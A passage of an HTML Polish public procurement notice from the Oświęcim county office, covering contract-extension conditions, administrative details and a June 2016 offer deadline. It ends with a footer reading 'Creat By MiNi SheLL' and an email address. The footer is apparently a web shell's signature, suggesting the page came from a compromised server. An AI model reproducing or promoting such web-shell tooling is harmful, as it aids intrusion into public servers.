c) brakiem możliwości prowadzenia robót na skutek niekorzystnych warunków atmosferycznych, co zostanie potwierdzone przez inspektora nadzoru wpisem do dziennika budowy. Czas trwania zamówienia zostanie przedłużony o taką ilość dni kalendarzowych, na jaką prace stanowiące przedmiot zamówienia zostały przerwane,
d) działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego,
e) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę,
f) wystąpieniem braku na rynku materiałów lub urządzeń, które mogłyby być zastąpione innymi materiałami lub urządzeniami spełniającymi wymagania Zamawiającego określone w SIWZ, a których termin dostawy jest dłuższy niż założony przy sporządzaniu oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.oswiecim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Oświęcimiu, ul. Wyspiańskiego 10, 32-602 Oświęcim - pok. 120, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2016 godzina 11:00, miejsce: Starostwo Powiatowe w Oświęcimiu, ul. Wyspiańskiego 10, 32-602 Oświęcim - pok. 12 Dzienniki Podawczy, Parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com